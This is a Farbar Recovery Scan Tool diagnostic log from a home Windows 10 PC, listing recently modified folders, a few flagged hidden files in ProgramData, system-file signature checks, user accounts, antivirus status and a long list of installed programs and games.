2017-08-30 18:40 - 2017-07-11 20:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit
2017-08-30 18:40 - 2017-07-01 17:30 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2017-08-30 18:40 - 2017-07-01 17:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2017-08-30 18:40 - 2017-06-21 21:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2017-08-30 18:40 - 2017-06-03 15:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Need for Speed™ Most Wanted
2017-08-30 18:40 - 2017-05-20 21:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Just Cause 2
2017-08-30 18:40 - 2017-04-30 13:07 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2017-08-30 18:40 - 2017-04-12 21:05 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Metal SLUG X 1.0
2017-08-30 18:40 - 2017-03-25 20:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst
2017-08-30 18:40 - 2017-02-12 12:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Atheros
2017-08-30 18:40 - 2017-02-12 12:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2017-08-30 18:40 - 2016-12-29 18:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SketchUp 2017
2017-08-30 18:40 - 2016-12-24 00:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MEGAsync
2017-08-30 18:40 - 2016-12-07 20:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-08-30 18:40 - 2016-11-27 14:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Baidu WiFi Hotspot
2017-08-30 18:40 - 2016-11-24 14:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield
2017-08-30 18:40 - 2016-11-23 16:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com
2017-08-30 18:40 - 2016-11-12 18:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sades 7.1CH Gaming Headset
2017-08-30 18:40 - 2016-11-10 08:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games for Windows Marketplace
2017-08-30 18:40 - 2016-11-09 22:37 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-30 18:40 - 2016-11-09 08:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam Customizer
2017-08-30 18:40 - 2016-10-18 17:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-08-30 18:40 - 2016-10-17 22:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sniper Ghost Warrior 2
2017-08-30 18:40 - 2016-10-17 18:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splinter Cell Conviction
2017-08-30 18:40 - 2016-10-12 18:19 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2017-08-30 18:40 - 2016-09-27 20:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016
2017-08-30 18:40 - 2016-09-27 20:55 - 000000000 ____D C:\WINDOWS\SHELLNEW
2017-08-30 18:40 - 2016-09-24 13:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-08-30 18:40 - 2016-09-22 17:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-30 18:40 - 2016-09-22 15:03 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z
2017-08-30 18:40 - 2016-09-22 14:34 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-08-30 18:40 - 2016-09-22 14:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-08-30 18:40 - 2016-09-21 23:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2017-08-30 18:40 - 2016-09-21 23:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2017-08-30 18:40 - 2016-09-21 23:43 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-08-30 18:40 - 2016-09-21 23:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-08-30 18:40 - 2016-09-21 23:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2017-08-30 18:40 - 2016-09-21 23:29 - 000000000 ____D C:\WINDOWS\system32\nn-NO
2017-08-30 18:40 - 2016-09-21 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\winrm
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\WCN
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\slmgr
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\dsc
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\spool
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\MUI
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-30 18:34 - 2017-03-18 18:40 - 000000000 ____D C:\WINDOWS\system32\Dism
2017-08-30 18:34 - 2016-11-09 22:40 - 000000000 ____D C:\WINDOWS\SysWOW64\xlive
2017-08-30 18:34 - 2016-09-30 18:29 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-08-30 18:34 - 2016-05-14 00:12 - 000000000 ____D C:\WINDOWS\SysWOW64\hi-IN
2017-08-30 18:34 - 2016-05-14 00:12 - 000000000 ____D C:\WINDOWS\system32\hi-IN
2017-08-30 18:31 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\System
2017-08-30 18:31 - 2016-12-16 18:20 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2017-08-30 18:30 - 2017-07-07 19:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TAP-Windows
2017-08-30 18:30 - 2017-07-07 19:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Betternet Technologies Inc
2017-08-30 18:30 - 2017-05-26 19:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-08-30 18:30 - 2017-05-25 20:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Activision
2017-08-30 18:30 - 2017-03-26 11:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-08-30 18:30 - 2017-03-19 19:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\2K Sports
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\IME
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Help
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Cursors
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\ProgramData\USOPrivate
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Common Files\System
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-08-30 18:30 - 2017-01-28 16:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2017-08-30 18:30 - 2016-12-04 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NewBlue
2017-08-30 18:30 - 2016-11-24 20:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2017-08-30 18:30 - 2016-11-09 10:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
2017-08-30 18:30 - 2016-11-03 18:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ripstone
2017-08-30 18:30 - 2016-10-31 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Red Barrels
2017-08-30 18:30 - 2016-10-23 12:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom
2017-08-30 18:30 - 2016-10-18 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Studios
2017-08-30 18:30 - 2016-10-16 10:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-08-30 18:30 - 2016-10-05 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Square Enix
2017-08-30 18:30 - 2016-09-30 16:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Electronic Arts
2017-08-30 18:30 - 2016-09-22 22:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2017-08-30 18:30 - 2016-09-22 15:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2017-08-30 18:29 - 2015-10-30 14:24 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-08-30 18:28 - 2016-12-18 13:42 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-08-30 18:27 - 2017-01-28 16:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Syncios
2017-08-30 18:27 - 2016-11-01 23:00 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bigasoft
2017-08-30 18:24 - 2017-03-18 18:40 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2017-08-30 17:45 - 2016-09-22 13:52 - 000008192 __RSH C:\BOOTSECT.BAK
2017-08-27 18:02 - 2016-09-22 17:36 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\ElevatedDiagnostics
2017-08-24 21:56 - 2016-10-16 10:26 - 000000000 ____D C:\WINDOWS\pss
2017-08-24 21:49 - 2016-09-25 13:49 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Skype
2017-08-20 20:05 - 2017-07-22 18:07 - 000001224 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_MAC.bin
2017-08-20 20:05 - 2017-07-22 18:07 - 000000015 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_Comments.bin
2017-08-20 20:05 - 2017-07-22 18:07 - 000000015 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_Aliases.bin
2017-08-20 05:31 - 2016-11-21 17:59 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\Google
2017-08-20 05:31 - 2016-11-21 17:59 - 000000000 ____D C:\Program Files (x86)\Google
2017-08-18 17:39 - 2016-09-22 16:43 - 000544424 _____ (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-13 01:23 - 2017-07-07 19:22 - 000000000 ____D C:\ProgramData\Betternet
2017-08-13 01:12 - 2016-10-18 11:37 - 000000584 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2017-08-11 20:42 - 2017-04-10 20:22 - 000000000 ____D C:\Users\Aezia Aznan\Documents\Telltale Games
2017-08-11 19:54 - 2017-06-21 21:52 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\vlc
2017-08-10 19:26 - 2016-09-21 23:18 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\NVIDIA Corporation
2017-08-06 14:47 - 2016-09-22 16:40 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-06 14:41 - 2016-09-22 16:40 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-06 14:06 - 2016-09-21 23:18 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\NVIDIA
 
==================== Files in the root of some directories =======
 
2017-04-15 22:01 - 2017-04-15 22:01 - 002910365 _____ () C:\Program Files\WinRAR.rar
2016-10-25 20:55 - 2016-10-25 20:55 - 110033810 _____ () C:\Program Files (x86)\Origin.rar
2017-06-26 21:41 - 2017-06-26 21:41 - 000000132 _____ () C:\Users\Aezia Aznan\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-10-12 18:25 - 2017-06-23 14:18 - 000000034 _____ () C:\Users\Aezia Aznan\AppData\Roaming\AdobeWLCMCache.dat
2016-09-25 13:53 - 2016-09-25 13:53 - 000000480 ____H () C:\Users\Aezia Aznan\AppData\Roaming\½Ó
2016-09-27 08:52 - 2017-06-21 14:43 - 000007594 _____ () C:\Users\Aezia Aznan\AppData\Local\Resmon.ResmonCfg
2016-11-24 15:34 - 2016-11-24 15:34 - 000000000 _____ () C:\Users\Aezia Aznan\AppData\Local\{F1047976-43E6-49A6-BF52-4CA86F14DF92}
2016-09-25 13:54 - 2016-09-25 13:54 - 000000008 ____H () C:\ProgramData\@000001.dat
2016-09-25 13:54 - 2016-09-25 16:12 - 000000000 ____H () C:\ProgramData\@system.temp
2016-09-25 13:53 - 2016-09-25 15:11 - 000000656 ____H () C:\ProgramData\@system3.att
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
 
Files to move or delete:
====================
C:\ProgramData\@000001.dat
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-30 18:18
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-08-2017 01
Ran by Aezia (01-09-2017 19:52:00)
Running from C:\Users\Aezia Aznan\Downloads
Windows 10 Pro Version 1703 (X64) (2017-08-30 11:59:34)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3909864297-3729878400-1751894149-500 - Administrator - Disabled)
Aezia (S-1-5-21-3909864297-3729878400-1751894149-1001 - Administrator - Enabled) => C:\Users\Aezia Aznan
DefaultAccount (S-1-5-21-3909864297-3729878400-1751894149-503 - Limited - Disabled)
Guest (S-1-5-21-3909864297-3729878400-1751894149-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3909864297-3729878400-1751894149-1035 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"Just Cause 2" (HKLM-x32\...\{E2FC9928-87BE-4947-B68E-4A3414E33767}_is1) (Version:  - )
µTorrent (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\uTorrent) (Version: 3.5.0.43580 - BitTorrent Inc.)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.2.0 - Adobe Systems Incorporated)
Advanced IP Scanner 2.5 (HKLM-x32\...\{6ABB4DB7-5E8F-4F7A-AAF2-C7B4337B7161}) (Version: 2.5.3233 - Famatech)
Age of Empires III - Complete Collection (HKLM-x32\...\Age of Empires III - Complete Collection_is1) (Version:  - )
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
Assassin's Creed IV Black Flag (HKLM-x32\...\Assassin's Creed IV Black Flag_is1) (Version: Assassin's Creed IV Black Flag - )
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS PC Link (HKLM-x32\...\{52AE8601-EA55-456E-80A9-7FB48E82CF81}_is1) (Version: 3.0.22.1029 - ASUSTEK)
Backup and Sync from Google (HKLM-x32\...\{4E99D34D-1CF8-45FA-BB4D-FBF30EA6E2FE}) (Version: 3.35.6251.4621 - Google, Inc.)
Baidu WiFi Hotspot (HKLM-x32\...\Baidu WiFi Hotspot) (Version: 5.1.4.124910 - Baidu, Inc.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.2.4.1118 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Betternet for Windows (HKLM-x32\...\{2E77104D-96E1-4A9C-86F2-C7CF4C703830}) (Version: 3.8.3.0 - Betternet Technologies Inc.)
Bigasoft Total Video Converter 5.0.6.5658 (HKLM-x32\...\{A72CE741-1F32-4D79-BFFB-A714375C6750}_is1) (Version:  - Bigasoft Corporation)
Call of Duty - World at War (HKLM-x32\...\Call of Duty - World at War_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Call of Duty® 4 - Modern Warfare™ (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty® 4 - Modern Warfare™ (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision)
Call of Duty: Black Ops (HKLM-x32\...\Call of Duty: Black Ops_is1) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
CodeBlocks (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team)
Counter-Strike Global Offensive WaRzOnE (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\CSGO) (Version:  - CS WaRzOnE)
CPUID CPU-Z MSI 1.77 (HKLM\...\CPUID CPU-Z MSI_is1) (Version: 1.77 - CPUID, Inc.)
CPUID HWMonitor Pro 1.26 (HKLM\...\CPUID HWMonitorPro_is1) (Version:  - )
CyberLink PowerDirector 14 (HKLM-x32\...\{6BADCD73-E925-46F7-A295-FF2448632728}) (Version: 14.0.2019.0 - CyberLink Corp.)
Dead Island Riptide (HKLM\...\Steam App 216250) (Version:  - Techland)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.55 - Synaptics Incorporated)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
DEVIL MAY CRY 4 (HKLM-x32\...\{D4E5A687-797D-44B1-8F96-4FD7A24166A9}) (Version: 1.00.000 - CAPCOM CO., LTD.)
DriverAgent-Plus 3.2016.10.12 (HKLM-x32\...\DriverAgent-Plus_is1) (Version:  - eSupport.com, Inc)
Epic Games Launcher (HKLM-x32\...\{2DE76AAC-8061-4D9B-B7BA-A7CFBE0F8048}) (Version: 1.1.86.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Final Fantasy XIII-2 (HKLM-x32\...\{4643D84D-4F97-49C1-9B86-6FB4DA5E706E}) (Version: 1.00.0000 - SQUARE ENIX)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Hotspot Shield 6.1.1 (HKLM-x32\...\{AF599C42-A2E5-4251-B7EE-4925B137BA53}) (Version: 6.1.1.10032 - AnchorFree Inc.) Hidden
Hotspot Shield 6.1.1 (HKLM-x32\...\{e829c2f6-17c1-4a94-850f-d564d315be9d}) (Version: 6.1.1.10032 - AnchorFree Inc.)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.19.108.1 - Intel Security)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
Jumpstart Installation Program (HKLM-x32\...\{B0BCDCBD-863D-4CAB-BF68-8D1F6B1BDC13}) (Version:  - Atheros)
KB4023057 (HKLM\...\{27C6D60B-CAD4-4C70-A1F2-299C731EA8F7}) (Version: 2.0.0.0 - Microsoft Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Logitech Gaming Software 8.87 (HKLM\...\Logitech Gaming Software) (Version: 8.87.116 - Logitech Inc.)
Mad Max (HKLM\...\Steam App 234140) (Version:  - Avalanche Studios)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.6331.1 - Waves Audio Ltd.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Metro 2033 (HKLM-x32\...\Metro 2033_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\OneDriveSetup.exe) (Version: 17.3.6943.0625 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{2DFD8316-9EF1-3210-908C-4CB61961C1AC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{527BBE2F-1FED-3D8B-91CB-4DB0F838E69E}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
